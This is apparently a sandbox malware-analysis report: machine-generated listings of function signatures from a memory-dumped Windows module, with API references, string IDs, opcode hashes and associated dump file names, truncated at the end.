                                            • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                            • String ID:
                                            • API String ID: 1303881157-0
                                            • Opcode ID: 7a25d73b0786201e5a31cf4bd97723dcefaed3ecc0ad798ac75fd867adb6854e
                                            • Instruction ID: 7728c178311906c69a61e5c09bc3d2100447ded09c6c09a595afa5dd1279f334
                                            • Opcode Fuzzy Hash: 7a25d73b0786201e5a31cf4bd97723dcefaed3ecc0ad798ac75fd867adb6854e
                                            • Instruction Fuzzy Hash: DF5109B5644302AFDB10CF34CC84B5A77A8AF49329F548659EC25CF2C6D7B1D802CBA1
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 689A42DD
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 689A4363
                                            • _memmove.LIBCMT ref: 689A4381
                                            • _memmove.LIBCMT ref: 689A43E6
                                            • _memmove.LIBCMT ref: 689A4453
                                            • _memmove.LIBCMT ref: 689A4474
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 4034224661-3788999226
                                            • Opcode ID: 6918b3f8738bb2c00a3fae64e013665e6d8d7ab361886231294a2b6f980dc226
                                            • Instruction ID: 01bf9cb83cc3f0b7f7eb29a59cae8a28fc6307559aa2a60fc80f826395e942cf
                                            • Opcode Fuzzy Hash: 6918b3f8738bb2c00a3fae64e013665e6d8d7ab361886231294a2b6f980dc226
                                            • Instruction Fuzzy Hash: 5B51A1B67042028FC718CF78DD8596BB7E9EBD4214F544A2DF856C3344EA71E905CAA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 2168136238-4289949731
                                            • Opcode ID: 656a7dd36ec460ea1245489ee6f586eeed66a49290bbca8da632523b71155a4a
                                            • Instruction ID: 8f8c465a5352e705804cc0dc8edb72ab0e705ba4906283ab1827c327363d52b3
                                            • Opcode Fuzzy Hash: 656a7dd36ec460ea1245489ee6f586eeed66a49290bbca8da632523b71155a4a
                                            • Instruction Fuzzy Hash: DF4196327052118BD734CE1CDC80E7EF3E9EBD5714BA50A2EE161C7692D761DC868B62
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSDi
                                            • API String ID: 4225690600-559181253
                                            • Opcode ID: 5a269c5c84819cce5cb9f14562ba6e48c07a254351d20a99b8e432003d26c3f7
                                            • Instruction ID: 046811ac99d00074f1b42a60e956a45a248c78977a2b542d39fac670d9064304
                                            • Opcode Fuzzy Hash: 5a269c5c84819cce5cb9f14562ba6e48c07a254351d20a99b8e432003d26c3f7
                                            • Instruction Fuzzy Hash: C2414B74A016089FDB00DFA9C980E5EB7FEAF89314F60858AE519EB355DB31E881CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSUa
                                            • API String ID: 4225690600-2086061799
                                            • Opcode ID: 59248ffaa30527e2a4661330ba46d9ea5d5b92b5c7f2a2342c148e3c69a9ae5c
                                            • Instruction ID: a62ed4ab3b74534660239e442dad0b5e7f568b91677019367f4c7f1ac4fae426
                                            • Opcode Fuzzy Hash: 59248ffaa30527e2a4661330ba46d9ea5d5b92b5c7f2a2342c148e3c69a9ae5c
                                            • Instruction Fuzzy Hash: FD312870A006189FEB00DBA9CC80B6EB7FDAF89314F60858AE518E7251C771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RS:h
                                            • API String ID: 4225690600-3891202347
                                            • Opcode ID: 02b64e95c376b59648da14796405387add3a9fb2f25177fd787919d8d28b483c
                                            • Instruction ID: 3d6b9ec9ca24b6b6110b010d32268cd902f13ef04eac782a78b894e43e4ff551
                                            • Opcode Fuzzy Hash: 02b64e95c376b59648da14796405387add3a9fb2f25177fd787919d8d28b483c
                                            • Instruction Fuzzy Hash: E7312A70A006089FEB10DFA8CC80B6EB7BDAF99614F608596E418E7255C771E9818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RS3g
                                            • API String ID: 4225690600-2794631155
                                            • Opcode ID: 07364076eea1c3a52dd7b0c5b80a9f10c4265379c2405238c7f8ac1b24fc7f1c
                                            • Instruction ID: f7f72314595992c8aa58d51cfc6ff28d65fdacc26597c468e8e9b7394c53679f
                                            • Opcode Fuzzy Hash: 07364076eea1c3a52dd7b0c5b80a9f10c4265379c2405238c7f8ac1b24fc7f1c
                                            • Instruction Fuzzy Hash: 35313B70A006199FDB00DFA8CD80B6DB7FDAF89614F608696E428E7255CB71E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSqb
                                            • API String ID: 4225690600-347567867
                                            • Opcode ID: 15bcee82584ddef1bc5da76bfcaab540597d7e1bc81ab99fad4b880ad3c92c0a
                                            • Instruction ID: 6fbdbe3b3ed7064c4fc4622ea27204db78b3aecedbc8cf0db2d850fbe0321a3d
                                            • Opcode Fuzzy Hash: 15bcee82584ddef1bc5da76bfcaab540597d7e1bc81ab99fad4b880ad3c92c0a
                                            • Instruction Fuzzy Hash: AA314974A006089FDB00DFA8CD80B6EB7FDAF99314F60858AE518EB241DB71E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSa
                                            • API String ID: 4225690600-3169278968
                                            • Opcode ID: 7f6f487e9c29fcea4c91a247c6c7c3f82584b9b5cce55ecbf5a7a4fd31f0f1bc
                                            • Instruction ID: 7fcec94762b4d71e411943a7296e13ffab61db8ada9c6d4fb2f0d212992911f3
                                            • Opcode Fuzzy Hash: 7f6f487e9c29fcea4c91a247c6c7c3f82584b9b5cce55ecbf5a7a4fd31f0f1bc
                                            • Instruction Fuzzy Hash: 68313C74A006189FDB00DFA9CD80B6DB7FDAF99314F608596E518E7251C771E981CF50
                                            APIs
                                            • type_info::operator!=.LIBCMT ref: 6899C7EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: type_info::operator!=
                                            • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                            • API String ID: 2241493438-339133643
                                            • Opcode ID: 224f336401bf658f7edaf70b95455e3d54b311d11ea11bbaabf92337d31bfe8a
                                            • Instruction ID: 1d90c90164a002997d6b971eed9da1c58f2310ddc555fa6ce33feea10b33c540
                                            • Opcode Fuzzy Hash: 224f336401bf658f7edaf70b95455e3d54b311d11ea11bbaabf92337d31bfe8a
                                            • Instruction Fuzzy Hash: BD318C75A543409ECB049F7C894655EFBF1AFD5208F884A2EF445AB320EB71D848CB83
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RS%e
                                            • API String ID: 4225690600-1409579784
                                            • Opcode ID: 24fa3b20458098fefddfc8a381fd6d7ac058deda890bc09ef89e8ff2ddfde635
                                            • Instruction ID: f97e9eb938304d53b8cb9c4afa3d1305eb2dbbbf14f8d488daefe10b5d731003
                                            • Opcode Fuzzy Hash: 24fa3b20458098fefddfc8a381fd6d7ac058deda890bc09ef89e8ff2ddfde635
                                            • Instruction Fuzzy Hash: 42315AB0A006189FDB10CBA8CC80FADB7BEAF89714FA0859AE518E7241C771D980CF50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit
                                            • String ID:
                                            • API String ID: 2610073882-0
                                            • Opcode ID: 81f3686d97abbdf40db2a5d59f0d7abf25eeb27dfd16f6e39df89528660ec084
                                            • Instruction ID: dfb351c75f8eeddefb760e37bf893363eeee7098d7f3611cc9daa736d2d64ed0
                                            • Opcode Fuzzy Hash: 81f3686d97abbdf40db2a5d59f0d7abf25eeb27dfd16f6e39df89528660ec084
                                            • Instruction Fuzzy Hash: 04C148756087019FC301DF58C88095BBBEAFFD9304F648A4DF5A89B265D731E845CBA2
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 68959DEB
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68959DFB
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68959E29
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 68959F25
                                            • VariantClear.OLEAUT32(?), ref: 68959FE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                            • String ID: @
                                            • API String ID: 3214203402-2766056989
                                            • Opcode ID: 4e8b6384d4d75b8a011576076da687910b1a56ca822dedaa295356784ca4e56e
                                            • Instruction ID: 6e1c78809dc510fea1881405a41eefc70cbce7fd1c46129a70bf5d97e2f9df93
                                            • Opcode Fuzzy Hash: 4e8b6384d4d75b8a011576076da687910b1a56ca822dedaa295356784ca4e56e
                                            • Instruction Fuzzy Hash: 3FD15BB1E00249CFDB00DFA8C884AADBBB9FF49308FA48159E515AB354D731AE55CF91
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6895B3EB
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6895B3FB
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6895B429
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6895B525
                                            • VariantClear.OLEAUT32(?), ref: 6895B5E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                            • String ID: @
                                            • API String ID: 3214203402-2766056989
                                            • Opcode ID: 89ebee2b0a5f53b6d6da1bca9cdf927446d2dc54bc202d1fcff96b8e61b2a5d5
                                            • Instruction ID: 86b14393075fdbfa4ac6daa4c2b423469818aa7ec8ac96ae8a4aeb1b2b835eda
